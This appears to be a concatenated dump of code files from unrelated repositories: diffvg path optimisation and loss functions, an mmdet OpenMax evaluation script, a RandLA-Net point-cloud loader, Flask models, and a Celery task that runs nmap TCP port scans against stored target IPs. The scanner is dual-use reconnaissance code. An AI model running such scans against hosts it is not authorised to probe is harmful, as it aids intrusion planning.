points_optim = torch.optim.Adam(points_vars, lr=1.0)
color_optim = torch.optim.Adam(color_vars, lr=0.01)
points_scheduler = CosineAnnealingLR(points_optim, args.num_iter, eta_min=0.1)
color_scheduler = CosineAnnealingLR(color_optim, args.num_iter, eta_min=0.001)
# Adam iterations.
t_range = tqdm(range(args.num_iter))
for t in t_range:
points_optim.zero_grad()
color_optim.zero_grad()
# Forward pass: render the image.
scene_args = pydiffvg.RenderFunction.serialize_scene(canvas_width, canvas_height, shapes, shape_groups)
img = render(canvas_width, canvas_height, 2, 2, t, None, *scene_args)
# Compose img with white background
img = img[:, :, 3:4] * img[:, :, :3] + torch.ones(img.shape[0], img.shape[1], 3, device = pydiffvg.get_device()) * (1 - img[:, :, 3:4])
# if t == args.num_iter - 1:
# pydiffvg.imwrite(img.cpu(), 'results/recursive/{}_path{}[{}].png'.
# format(filename, args.num_paths, current_path_str[:-1]), gamma=gamma)
img = img[:, :, :3]
img = img.unsqueeze(0).permute(0, 3, 1, 2) # HWC -> NCHW
loss = (img - target).pow(2).mean()
# print(f'iteration: {t} \t render loss: {loss.item()}')
t_range.set_postfix({'loss': loss.item()})
# Backpropagate the gradients.
loss.backward()
# Take a gradient descent step.
points_optim.step()
color_optim.step()
points_scheduler.step()
color_scheduler.step()
for group in shape_groups:
group.fill_color.data.clamp_(0.0, 1.0)
if t == args.num_iter - 1:
save_name = 'results/recursive/{}_path{}[{}]-segments{}'.\
format(filename, args.num_paths,current_path_str[:-1], args.num_segments)
if args.free:
save_name+='-free'
save_name+='.svg'
pydiffvg.save_svg(save_name, canvas_width, canvas_height, shapes, shape_groups)
old_shapes = shapes
old_shape_groups = shape_groups
print(f"\nDone! total {sum(num_paths_list)} paths, the last loss is: {loss.item()}.\n")
if __name__ == "__main__":
main()
```
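The script above is driven entirely by `argparse`, so it can also be invoked programmatically by patching `sys.argv`; the target image path below is an assumption, not a file from the repository:

```python
import sys
from recursive import main  # assumes the file above is saved as recursive.py

# Illustrative arguments: paint the target with 1, then 2, then 4 additional paths.
sys.argv = ["recursive.py", "target.png", "--num_paths", "1,2,4", "--num_iter", "200", "--free"]
main()
```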
#### File: pair/Layerwise/XingLoss_bak.py
```python
import torch
import numpy as np
def cross_mul(a, b, c):
return (c[1] - a[1]) * (b[0] - a[0]) - (b[1] - a[1]) * (c[0] - a[0])
def triangle_area(A, B, C):
out = (C - A).flip([-1]) * (B - A)
out = out[..., 1] - out[..., 0]
return out
def xing_loss(x_list, scale=1.0): # x[ npoints,2]
loss = 0.
for x in x_list:
x1 = torch.cat([x[1:, :], x[:1, :]], dim=0)
segments = torch.cat([x.unsqueeze(dim=-1), x1.unsqueeze(dim=-1)],
dim=-1) # [npoints, 2, 2], npoints, xy, start-end
mutual_segments = segments.unsqueeze(dim=1).expand(-1, x.shape[0], -1, -1) # [npoints,npoints,2,2]
mutual_segments_2 = torch.transpose(mutual_segments, 0, 1)
mutual_segments = torch.cat([mutual_segments, mutual_segments_2], dim=-1) # [npoints,npoints,2,4] 4 is A,B,C,D
Area_AB_C = triangle_area(mutual_segments[:, :, :, 0], mutual_segments[:, :, :, 1], mutual_segments[:, :, :, 2])
Area_AB_D = triangle_area(mutual_segments[:, :, :, 0], mutual_segments[:, :, :, 1], mutual_segments[:, :, :, 3])
Area_CD_A = triangle_area(mutual_segments[:, :, :, 2], mutual_segments[:, :, :, 3], mutual_segments[:, :, :, 0])
Area_CD_B = triangle_area(mutual_segments[:, :, :, 2], mutual_segments[:, :, :, 3], mutual_segments[:, :, :, 1])
condition1 = ((Area_AB_C * Area_AB_D) <= 0.).float()
condition2 = ((Area_CD_A * Area_CD_B) <= 0.).float()
mask = condition1*condition2 # mask is without gradient.
area_AB_1 = (abs(Area_AB_C))/(abs(Area_AB_D)+ 1e-5)
area_AB_2 = (abs(Area_AB_D))/(abs(Area_AB_C)+ 1e-5)
area_AB,_ = torch.cat([area_AB_1.unsqueeze(dim=-1),area_AB_2.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_AB = torch.clip(area_AB, 0.0, 1.0)
area_AB = torch.nan_to_num(area_AB, nan=0.0)
area_CD_1 = (abs(Area_CD_A))/(abs(Area_CD_B)+ 1e-5)
area_CD_2 = (abs(Area_CD_B))/(abs(Area_CD_A)+ 1e-5)
area_CD, _ = torch.cat([area_CD_1.unsqueeze(dim=-1),area_CD_2.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_CD = torch.clip(area_CD, 0.0, 1.0)
area_CD = torch.nan_to_num(area_CD, nan=0.0)
area_loss, _ = torch.cat([area_AB.unsqueeze(dim=-1),area_CD.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_loss = area_loss*mask
# print(f"mask is: {mask}")
# print(f"area_loss is: {area_loss}")
area_loss = area_loss.sum()/((x.shape[0]-2)**2)
loss += area_loss*scale
return loss / (len(x_list))
if __name__ == "__main__":
x = torch.rand([6, 2])
scale = 0.001
y = xing_loss([x], scale)
print(y)
"""
a = torch.Tensor([0., 0.])
b = torch.Tensor([0., 3.])
c = torch.Tensor([4., 0.])
print(cross_mul(b, a, c))
a = torch.Tensor([[1, 2, 3, 4]])
a = a.expand(4, -1)
print(a)
b = torch.transpose(a, 0, 1)
print(b)
"""
# a = torch.Tensor([[0, 0]])
# b = torch.Tensor([[0, 3]])
# c = torch.Tensor([[1, 1]])
# d = torch.Tensor([[-1, 1]])
# print(triangle_area(a, b, c))
# print(triangle_area(a, b, d))
# a =torch.rand(3,2)
# v,id = a.min(dim=-1)
# print(v)
# print(id)
# print(f"===> test cosine similarity ===")
# # doesn't work
# points = torch.rand(13,2)
# point_init = points[:1,:]
# cos = torch.nn.CosineSimilarity(dim=1, eps=1e-6)
# smi = cos(point_init, points)
# indx = torch.argsort(smi, dim=0, descending=True)
# points = points[indx,:]
# print(smi)
# print(f"===> vis cosine similarity ===")
# points = torch.Tensor([[0.9665, 0.4407],
# [0.9724, 0.4446],
# [0.9603, 0.4345],
# [0.9202, 0.4145],
# [0.9622, 0.4459],
# [0.9445, 0.4152],
# [0.9545, 0.4520],
# [0.9857, 0.4314],
# [0.9638, 0.4654],
# [0.9418, 0.4613],
# [0.9435, 0.3927],
# [0.9455, 0.3910]])
# points = torch.rand(14,2)
# # sort control points by cosine-limilarity.
# point_init = points.mean(dim=0, keepdim=True)
# import torch.nn.functional as F
# smi = F.cosine_similarity(torch.tensor([[1.,0.]]), points-point_init, dim=1, eps=1e-6)
# print(f"smi is {smi}")
# indx = torch.argsort(smi, dim=0, descending=False)
# print(points)
# print(indx)
# points = points[indx,:]
# print(points)
# smi = F.cosine_similarity(point_init, points, dim=1, eps=1e-6)
# print(smi)
#
#
# x_list = []
# y_list = []
# labels = []
# for i in range(0, points.shape[0]):
# x_list.append(points[i,0])
# y_list.append(points[i,1])
# labels.append(i)
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# ax.scatter(x_list, y_list)
# ax.scatter([point_init[0,0]], [point_init[0,1]])
# ax.plot(x_list, y_list)
# for i, txt in enumerate(labels):
# ax.annotate(txt, (x_list[i], y_list[i]))
# plt.show()
# a =torch.rand(4,1)
# b = torch.permute(a, dims=[1,0])
# c = torch.matmul(a,b)
# d = torch.triu(c, diagonal=2)
# print(c)
# print(d)
a = torch.Tensor([[0.,-1.]])
b = torch.tensor([[-0.5,-0.5]])
import torch.nn.functional as F
sim = torch.cosine_similarity(a, b, dim=1, eps=1e-6)
print(sim)
inner_product = (a * b).sum(dim=1)
a_norm = a.pow(2).sum(dim=1).pow(0.5)
b_norm = b.pow(2).sum(dim=1).pow(0.5)
cos = inner_product / (2 * a_norm * b_norm)
angle = torch.acos(cos)
print(cos)
print(torch.atan2(torch.Tensor([-0.0001]),torch.Tensor([-1.])))
```
#### File: pair/Layerwise/XingLoss.py
```python
import torch
import numpy as np
def area(a, b, c):
return (c[1] - a[1]) * (b[0] - a[0]) - (b[1] - a[1]) * (c[0] - a[0])
def triangle_area(A, B, C):
out = (C - A).flip([-1]) * (B - A)
out = out[..., 1] - out[..., 0]
return out
def compute_sine_theta(s1, s2):  # s1 and s2 are the two segments to be used
#s1, s2 (2, 2)
v1 = s1[1,:] - s1[0, :]
v2 = s2[1,:] - s2[0, :]
#print(v1, v2)
sine_theta = ( v1[0] * v2[1] - v1[1] * v2[0] ) / (torch.norm(v1) * torch.norm(v2))
return sine_theta
def xing_loss(x_list, scale=1e-3): # x[ npoints,2]
loss = 0.
#print(len(x_list))
for x in x_list:
#print(x)
seg_loss = 0.
N = x.size()[0]
x = torch.cat([x,x[0,:].unsqueeze(0)], dim=0) #(N+1,2)
segments = torch.cat([x[:-1,:].unsqueeze(1), x[1:,:].unsqueeze(1)], dim=1) #(N, start/end, 2)
assert N % 3 == 0, 'The segment number is not correct!'
segment_num = int(N / 3)
for i in range(segment_num):
cs1 = segments[i*3, :, :] #start control segs
cs2 = segments[i*3 + 1, :, :] #middle control segs
cs3 = segments[i*3 + 2, :, :] #end control segs
#print('the direction of the vectors:')
#print(compute_sine_theta(cs1, cs2))
direct = (compute_sine_theta(cs1, cs2) >= 0).float()
opst = 1 - direct #another direction
sina = compute_sine_theta(cs1, cs3) #the angle between cs1 and cs3
seg_loss += direct * torch.relu( - sina) + opst * torch.relu(sina)
# print(direct, opst, sina)
seg_loss /= segment_num
templ = seg_loss
loss += templ * scale #area_loss * scale
return loss / (len(x_list))
if __name__ == "__main__":
#x = torch.rand([6, 2])
#x = torch.tensor([[0,0], [1,1], [2,1], [1.5,0]])
x = torch.tensor([[0,0], [1,1], [2,1], [0.5,0]])
#x = torch.tensor([[1,0], [2,1], [0,1], [2,0]])
scale = 1 #0.5
y = xing_loss([x], scale)
print(y)
x = torch.tensor([[0,0], [1,1], [2,1], [2.,0]])
#x = torch.tensor([[1,0], [2,1], [0,1], [2,0]])
scale = 1 #0.5
y = xing_loss([x], scale)
print(y)
```
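A self-contained sketch of how the penalty above can be combined with a reconstruction loss during optimization; the `1e-2` weight and the synthetic tensors are assumptions (in the actual scripts the points come from `pydiffvg.Path.points`):

```python
import torch
from XingLoss import xing_loss  # assumes the file above is saved as XingLoss.py

# A closed cubic Bezier path with 2 segments has 6 control points (N must be a multiple of 3).
points = torch.rand(6, 2, requires_grad=True)
img = torch.rand(1, 3, 64, 64, requires_grad=True)
target = torch.rand(1, 3, 64, 64)

loss = (img - target).pow(2).mean() + xing_loss([points], scale=1e-2)
loss.backward()
print(float(loss), points.grad.shape)
```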
#### File: realimage/models/Example.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import pydiffvg
from torchvision.models import resnet50
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
pydiffvg.set_use_gpu(torch.cuda.is_available())
class Predictor(nn.Module):
def __init__(self, paths=512, segments=2, max_width=2.0, im_size=224.0):
super(Predictor, self).__init__()
self.points = nn.Parameter(torch.rand(2 * paths * (segments * 3 + 1)))
self.widths = nn.Parameter(torch.rand(paths))
self.colors = nn.Parameter(torch.rand(paths*4))
self.max_width = max_width
self.im_size = im_size
def forward(self): # [b,z_dim]
points = torch.tanh(self.points)
points = points * (self.im_size // 2) + self.im_size // 2
widths = torch.sigmoid(self.widths)
widths = (self.max_width - 1) * widths + 1
colors = torch.sigmoid(self.colors)
return {
"points": points,
"widths": widths,
"colors": colors
}
if __name__ == '__main__':
model = Predictor()
model.to("cuda")
out = model()
print(out)
```
#### File: models/backbone/conv_resmlp1.py
```python
import torch
import numpy as np
from torch import nn
from einops.layers.torch import Rearrange
class Aff(nn.Module):
def __init__(self, dim):
super().__init__()
self.alpha = nn.Parameter(torch.ones([1, 1, dim]))
self.beta = nn.Parameter(torch.zeros([1, 1, dim]))
def forward(self, x):
x = x * self.alpha + self.beta
return x
class FeedForward(nn.Module):
def __init__(self, dim, hidden_dim, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, hidden_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(hidden_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x):
return self.net(x)
class MLPblock(nn.Module):
def __init__(self, dim, num_patch, mlp_dim, dropout = 0., init_values=1e-4):
super().__init__()
self.pre_affine = Aff(dim)
self.token_mix = nn.Sequential(
Rearrange('b n d -> b d n'),
nn.Linear(num_patch, num_patch),
Rearrange('b d n -> b n d'),
)
self.ff = nn.Sequential(
FeedForward(dim, mlp_dim, dropout),
)
self.post_affine = Aff(dim)
self.gamma_1 = nn.Parameter(init_values * torch.ones((dim)), requires_grad=True)
self.gamma_2 = nn.Parameter(init_values * torch.ones((dim)), requires_grad=True)
def forward(self, x):
x = self.pre_affine(x)
x = x + self.gamma_1 * self.token_mix(x)
x = self.post_affine(x)
x = x + self.gamma_2 * self.ff(x)
return x
class ConvResMLP1(nn.Module):
def __init__(self, in_channels=3, dim=384, num_classes=384, patch_size=16, image_size=224, depth=12, mlp_dim=384*4):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
self.num_patch = (image_size// patch_size) ** 2
self.to_patch_embedding = nn.Sequential(
nn.Conv2d(in_channels, dim, patch_size, patch_size),
nn.BatchNorm2d(dim),
nn.GELU(),
nn.Conv2d(dim, dim, 3, padding=1),
nn.BatchNorm2d(dim),
nn.GELU(),
nn.Conv2d(dim, dim, 3, padding=1),
Rearrange('b c h w -> b (h w) c'),
)
self.mlp_blocks = nn.ModuleList([])
for _ in range(depth):
self.mlp_blocks.append(MLPblock(dim, self.num_patch, mlp_dim))
self.affine = Aff(dim)
# self.fc = nn.Sequential(
# nn.Linear(dim, num_classes)
# )
def forward(self, x):
x = self.to_patch_embedding(x)
for mlp_block in self.mlp_blocks:
x = mlp_block(x)
x = self.affine(x)
# x = x.mean(dim=1)
return x
if __name__ == "__main__":
img = torch.ones([1, 3, 224, 224])
model = ConvResMLP1()
parameters = filter(lambda p: p.requires_grad, model.parameters())
parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000
print('Trainable Parameters: %.3fM' % parameters)
out_img = model(img)
print("Shape of out :", out_img.shape) # [B, in_channels, image_size, image_size]
``` |
{
"source": "13952522076/mmdetection",
"score": 2
} |
#### File: datasets/ADE20k_process/coco_split.py
```python
import os
import glob
import argparse
import json
import numpy as np
from scipy.misc import imread
from pycocotools import mask as COCOmask
# strict mapping class
split_coco_id_24classes = [60, 1, 61, 57, 3, 72, 73, 62, 74, 14, 64, 9, 6, 8, 5,
40, 70, 33, 69, 2, 63, 76, 10, 75 ]
split_coco_id_24classes = [60, 1, 61, 57, 3, 72, 73, 62, 74, 14, 64, 9, 6, 8, 5,
40, 70, 33, 69, 2, 63, 76, 10, 75,58, 12, 25, 47, 48,
49, 50, 51, 52, 53, 54, 55, 56, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24]
def parse_args():
parser = argparse.ArgumentParser(description='Evaluation demo')
parser.add_argument('--ann_file', default='/Users/melody/Downloads/instances_val2017.json') # CHANGE ACCORDINGLY
parser.add_argument('--output_overlap_json', default='/Users/melody/Downloads/instances_val2017_24classes.json')
parser.add_argument('--output_rest__json', default='/Users/melody/Downloads/instances_val2017_76classes.json')
# parser.add_argument('--parsing_2coco', action='store_true', help='Parsing ADE20K cat_id to COCO id.')
args = parser.parse_args()
return args
def convert(args):
data_dict = json.load(open(args.ann_file, 'r'))
images = data_dict['images']
licenses = data_dict['licenses']
info = data_dict['info']
categories = data_dict['categories']
annotations = data_dict['annotations']
print('#Images: {}, # totally instances: {}'.format(len(images), len(annotations)))
overlap_ann = []
rest_ann = []
for i in range(0,len(annotations)):
if i % 100 == 0:
print('#files processed: {}'.format(i))
if annotations[i]['category_id']in split_coco_id_24classes:
overlap_ann.append(annotations[i])
else:
rest_ann.append(annotations[i])
overlap_out = {'licenses': licenses,
'categories': categories,
'images': images,
'annotations': overlap_ann,
'info': info
}
rest_out = {'licenses': licenses,
'categories': categories,
'images': images,
'annotations': rest_ann,
'info': info
}
print("{}: instance: {}".format(args.output_overlap_json, len(overlap_ann)))
with open(args.output_overlap_json, 'w') as f:
json.dump(overlap_out, f)
print("{}: instance: {}".format(args.output_rest__json, len(rest_ann)))
with open(args.output_rest__json, 'w') as f:
json.dump(rest_out, f)
if __name__ == '__main__':
args = parse_args()
convert(args)
``` |
{
"source": "13952522076/mmdet",
"score": 2
} |
#### File: mmdet/helper/test_result_val.py
```python
import argparse
import os
import mmcv
import torch
from tqdm import tqdm
from mmcv import Config, DictAction
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import get_dist_info, init_dist, load_checkpoint
from tools.fuse_conv_bn import fuse_module
from mmdet.apis import multi_gpu_test, single_gpu_test
from mmdet.core import wrap_fp16_model
from mmdet.datasets import build_dataloader, build_dataset
from mmdet.models import build_detector
from mmdet.datasets.coco import CocoDataset
import warnings
from mmdet.helper.openmax import *
def parse_args():
parser = argparse.ArgumentParser(
description='Lightweight MMDet test (and eval) a model from the results.pkl')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('--out', default='/home/xuma/mmdet/work_dirs/mask_rcnn_osr50/output_val.pkl',
help='output result file in pickle format')
parser.add_argument('--weibull', default='/home/xuma/mmdet/work_dirs/mask_rcnn_osr50/weibull_model.pkl',
help='output result file in pickle format')
parser.add_argument('--threshold',type=float,default=0.1, help='score threshold for known classes')
parser.add_argument('--knownclass', type=int, default=50, help="the number of known classes")
parser.add_argument('--alpha', type=int, default=10, help="parameter alpha for openmax")
parser.add_argument(
'--fuse-conv-bn',
action='store_true',
help='Whether to fuse conv and bn, this will slightly increase'
'the inference speed')
parser.add_argument(
'--format-only',
action='store_true',
help='Format the output results without perform evaluation. It is'
'useful when you want to format the result to a specific format and '
'submit it to the test server')
parser.add_argument(
'--eval',
type=str,
nargs='+',
help='evaluation metrics, which depends on the dataset, e.g., "bbox",'
' "segm", "proposal" for COCO, and "mAP", "recall" for PASCAL VOC')
parser.add_argument('--show', action='store_true', help='show results')
parser.add_argument(
'--show-dir', help='directory where painted images will be saved')
parser.add_argument(
'--show-score-thr',
type=float,
default=0.3,
help='score threshold (default: 0.3)')
parser.add_argument(
'--gpu-collect',
action='store_true',
help='whether to use gpu to collect results.')
parser.add_argument(
'--tmpdir',
help='tmp directory used for collecting results from multiple '
'workers, available when gpu-collect is not specified')
parser.add_argument(
'--options', nargs='+', action=DictAction, help='arguments in dict')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
warnings.filterwarnings('ignore')
assert args.out or args.eval or args.format_only or args.show \
or args.show_dir, \
('Please specify at least one operation (save/eval/format/show the '
'results / save the results) with the argument "--out", "--eval"'
', "--format-only", "--show" or "--show-dir"')
if args.eval and args.format_only:
raise ValueError('--eval and --format_only cannot be both specified')
if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):
raise ValueError('The output file must be a pkl file.')
cfg = Config.fromfile(args.config)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
cfg.model.pretrained = None
if cfg.model.get('neck'):
if cfg.model.neck.get('rfp_backbone'):
if cfg.model.neck.rfp_backbone.get('pretrained'):
cfg.model.neck.rfp_backbone.pretrained = None
cfg.data.test.test_mode = True
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# build the dataloader
# TODO: support multiple images per gpu (only minor changes are needed)
dataset = build_dataset(cfg.data.test)
outputs = mmcv.load(args.out)
weibull_model = mmcv.load(args.weibull)
new_outputs= []
known_classes = list(range(1, args.knownclass+1))
for image in tqdm(outputs):
bboxes, segs, feas = image
new_bboxes = [ [] for _ in range(0,args.knownclass+1)]
new_segs = [ [] for _ in range(0,args.knownclass+1)]
new_feas = [ [] for _ in range(0,args.knownclass+1)]
for i in range(0,len(feas)):
if len(feas[i])>0:
for j in range(0,len(feas[i])):
roi_cat_fea = np.expand_dims(feas[i][j], axis=0)
so, _ = openmax(weibull_model, known_classes, roi_cat_fea, 0.5, args.alpha, "euclidean")
predicted_label_index = np.argmax(so) if np.max(so) >= args.threshold else args.knownclass
new_feas[predicted_label_index].append(feas[i][j])
new_segs[predicted_label_index].append(segs[i][j])
new_bboxes[predicted_label_index].append(bboxes[i][j])
new_feas = [np.asarray(new_fea) for new_fea in new_feas]
# new_segs = [np.asarray(new_seg) for new_seg in new_segs]
new_bboxes = [np.asarray(new_bbox) for new_bbox in new_bboxes]
new_image= new_bboxes,new_segs,new_feas
new_outputs.append(new_image)
print("New ouput of openmax generated!!")
rank, _ = get_dist_info()
if rank == 0:
kwargs = {} if args.options is None else args.options
if args.format_only:
dataset.format_results(new_outputs, **kwargs)
if args.eval:
dataset.openevaluate(new_outputs, args.eval, **kwargs)
print("original output:")
dataset.openevaluate(outputs, args.eval, **kwargs)
if __name__ == '__main__':
main()
```
#### File: mmdet/helper/features2result.py
```python
import numpy as np
import torch
def features2result(features, labels, num_classes):
"""Convert detection results to a list of numpy arrays.
Args:
features (Tensor): shape (n, num_classes)
labels (Tensor): shape (n, )
num_classes (int): class number, including background class
Returns:
        list(ndarray): feature array of each class
"""
if features.shape[0] == 0:
return [np.zeros((0, num_classes), dtype=np.float32) for i in range(num_classes)]
else:
features = features.cpu().numpy()
labels = labels.cpu().numpy()
return [features[labels == i, :] for i in range(num_classes)]
``` |
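A quick, self-contained check of `features2result` with random tensors; the shapes and the import path (taken from the file location above) are assumptions, since the real inputs come from the detector's ROI head:

```python
import torch
from mmdet.helper.features2result import features2result  # assumes the repo root is on sys.path

# 5 ROIs with 4-dimensional feature vectors assigned to 3 classes (illustrative shapes).
features = torch.rand(5, 4)
labels = torch.tensor([0, 2, 1, 0, 2])

per_class = features2result(features, labels, num_classes=3)
print([fea.shape for fea in per_class])  # [(2, 4), (1, 4), (2, 4)]
```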
{
"source": "13952522076/RandLA-Net-pytorch-1",
"score": 2
} |
#### File: RandLA-Net-pytorch-1/dataset/semkitti_trainset.py
```python
from utils.data_process import DataProcessing as DP
from utils.config import ConfigSemanticKITTI as cfg
from os.path import join
import numpy as np
import pickle
import torch.utils.data as torch_data
import torch
class SemanticKITTI(torch_data.Dataset):
def __init__(self, mode, data_list=None):
self.name = 'SemanticKITTI'
self.dataset_path = './data/SemanticKITTI/dataset/sequences_0.06'
self.num_classes = cfg.num_classes
self.ignored_labels = np.sort([0])
self.mode = mode
if data_list is None:
if mode == 'training':
seq_list = ['00', '01', '02', '03', '04', '05', '06', '07', '09', '10']
elif mode == 'validation':
seq_list = ['08']
self.data_list = DP.get_file_list(self.dataset_path, seq_list)
else:
self.data_list = data_list
self.data_list = sorted(self.data_list)
def get_class_weight(self):
return DP.get_class_weights(self.dataset_path, self.data_list, self.num_classes)
def __len__(self):
return len(self.data_list)
def __getitem__(self, item):
selected_pc, selected_labels, selected_idx, cloud_ind = self.spatially_regular_gen(item, self.data_list)
return selected_pc, selected_labels, selected_idx, cloud_ind
def spatially_regular_gen(self, item, data_list):
# Generator loop
cloud_ind = item
pc_path = data_list[cloud_ind]
pc, tree, labels = self.get_data(pc_path)
# crop a small point cloud
pick_idx = np.random.choice(len(pc), 1)
selected_pc, selected_labels, selected_idx = self.crop_pc(pc, labels, tree, pick_idx)
return selected_pc, selected_labels, selected_idx, np.array([cloud_ind], dtype=np.int32)
def get_data(self, file_path):
seq_id = file_path[0]
frame_id = file_path[1]
kd_tree_path = join(self.dataset_path, seq_id, 'KDTree', frame_id + '.pkl')
# read pkl with search tree
with open(kd_tree_path, 'rb') as f:
search_tree = pickle.load(f)
points = np.array(search_tree.data, copy=False)
# load labels
label_path = join(self.dataset_path, seq_id, 'labels', frame_id + '.npy')
labels = np.squeeze(np.load(label_path))
return points, search_tree, labels
@staticmethod
def crop_pc(points, labels, search_tree, pick_idx):
# crop a fixed size point cloud for training
center_point = points[pick_idx, :].reshape(1, -1)
select_idx = search_tree.query(center_point, k=cfg.num_points)[1][0]
select_idx = DP.shuffle_idx(select_idx)
select_points = points[select_idx]
select_labels = labels[select_idx]
return select_points, select_labels, select_idx
def tf_map(self, batch_pc, batch_label, batch_pc_idx, batch_cloud_idx):
features = batch_pc
input_points = []
input_neighbors = []
input_pools = []
input_up_samples = []
for i in range(cfg.num_layers):
neighbour_idx = DP.knn_search(batch_pc, batch_pc, cfg.k_n)
sub_points = batch_pc[:, :batch_pc.shape[1] // cfg.sub_sampling_ratio[i], :]
pool_i = neighbour_idx[:, :batch_pc.shape[1] // cfg.sub_sampling_ratio[i], :]
up_i = DP.knn_search(sub_points, batch_pc, 1)
input_points.append(batch_pc)
input_neighbors.append(neighbour_idx)
input_pools.append(pool_i)
input_up_samples.append(up_i)
batch_pc = sub_points
input_list = input_points + input_neighbors + input_pools + input_up_samples
input_list += [features, batch_label, batch_pc_idx, batch_cloud_idx]
return input_list
def collate_fn(self, batch):
selected_pc, selected_labels, selected_idx, cloud_ind = [], [], [], []
for i in range(len(batch)):
selected_pc.append(batch[i][0])
selected_labels.append(batch[i][1])
selected_idx.append(batch[i][2])
cloud_ind.append(batch[i][3])
selected_pc = np.stack(selected_pc)
selected_labels = np.stack(selected_labels)
selected_idx = np.stack(selected_idx)
cloud_ind = np.stack(cloud_ind)
flat_inputs = self.tf_map(selected_pc, selected_labels, selected_idx, cloud_ind)
num_layers = cfg.num_layers
inputs = {}
inputs['xyz'] = []
for tmp in flat_inputs[:num_layers]:
inputs['xyz'].append(torch.from_numpy(tmp).float())
inputs['neigh_idx'] = []
for tmp in flat_inputs[num_layers: 2 * num_layers]:
inputs['neigh_idx'].append(torch.from_numpy(tmp).long())
inputs['sub_idx'] = []
for tmp in flat_inputs[2 * num_layers:3 * num_layers]:
inputs['sub_idx'].append(torch.from_numpy(tmp).long())
inputs['interp_idx'] = []
for tmp in flat_inputs[3 * num_layers:4 * num_layers]:
inputs['interp_idx'].append(torch.from_numpy(tmp).long())
inputs['features'] = torch.from_numpy(flat_inputs[4 * num_layers]).transpose(1, 2).float()
inputs['labels'] = torch.from_numpy(flat_inputs[4 * num_layers + 1]).long()
return inputs
``` |
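A sketch of how this dataset is usually wired into a PyTorch `DataLoader`; the batch size is an arbitrary choice and the preprocessed SemanticKITTI files are assumed to exist under the path hard-coded in `__init__`. The instance method `collate_fn` is what builds the per-layer `xyz` / `neigh_idx` / `sub_idx` / `interp_idx` tensors:

```python
from torch.utils.data import DataLoader
from dataset.semkitti_trainset import SemanticKITTI  # assumes the repo root is on sys.path

train_set = SemanticKITTI(mode='training')
train_loader = DataLoader(
    train_set,
    batch_size=4,                      # illustrative value
    shuffle=True,
    collate_fn=train_set.collate_fn,   # turns a list of samples into the nested input dict
)

for batch in train_loader:
    print(batch['features'].shape, batch['labels'].shape)
    break
```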
{
"source": "13955413303/zgc",
"score": 2
} |
#### File: zgc/app/__init__.py
```python
from flask import Flask
from app.ext import init_ext
def create_app():
app= Flask(__name__)
init_ext(app)
return app
```
#### File: zgc/app/models.py
```python
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class books(db.Model):
id = db.Column(db.Integer,primary_key=True,autoincrement=True)
name = db.Column(db.String(16))
auth = db.Column(db.String(16))
def __str__(self) -> str:
return 'name:%s,auth:%s'%(self.name,self.auth)
class user(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(16))
phone = db.Column(db.Integer)
``` |
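`db` is created here without an app, so it has to be bound to one inside the factory (presumably what `init_ext` does). A minimal sketch of that wiring with an assumed SQLite URI, shown explicitly rather than through `create_app`:

```python
from flask import Flask
from app.models import db, books

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///demo.db'  # assumed URI for illustration
db.init_app(app)

with app.app_context():
    db.create_all()
    db.session.add(books(name='Flask Web', auth='Alice'))
    db.session.commit()
    print(books.query.count())
```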
{
"source": "13984328535/nianhuatest",
"score": 2
} |
#### File: nianhuatest/home_application/celery_tasks.py
```python
import datetime
from celery import task
from celery.schedules import crontab
from celery.task import periodic_task
from common.log import logger
import os
import time
import re
import socket
from home_application.models import PortScanPara,PortScan
from threading import Thread
import nmap
def hostIpList():
return socket.gethostbyname_ex(socket.gethostname())[2]
def check_ip(ipAddr):
compile_ip=re.compile('^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
if compile_ip.match(ipAddr):
return True
else:
return False
def hostname():
sys = os.name
if sys == 'nt':
hostname = os.getenv('computername')
return hostname
elif sys == 'posix':
host = os.popen('echo $HOSTNAME')
try:
hostname = host.read()
return hostname
finally:
host.close()
else:
return 'Unkwon hostname'
def nmapScan(hostname,tip, port):
    portscan_recode = PortScan(source_hostname=hostname, target_ip=tip, target_port=port, state="scanning...", protocol="TCP")
portscan_recode.save()
nmScan = nmap.PortScanner()
nmScan.scan(tip, port, arguments='-T4 -Pn')
state = nmScan[tip]['tcp'][int(port)]['state']
PortScan.objects.filter(source_hostname=hostname, target_ip=tip, target_port=port).update(state=state, scan_time=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())))
@task()
def async_portscan():
logger.error(u"celery 定时任务执行成功,async_portscan")
last_scantask = PortScanPara.objects.filter().last()
host = hostname();
source_hostname = last_scantask.source_hostname
target_ip = last_scantask.target_ip
target_port = last_scantask.target_port
target_ips = str(target_ip).split(',')
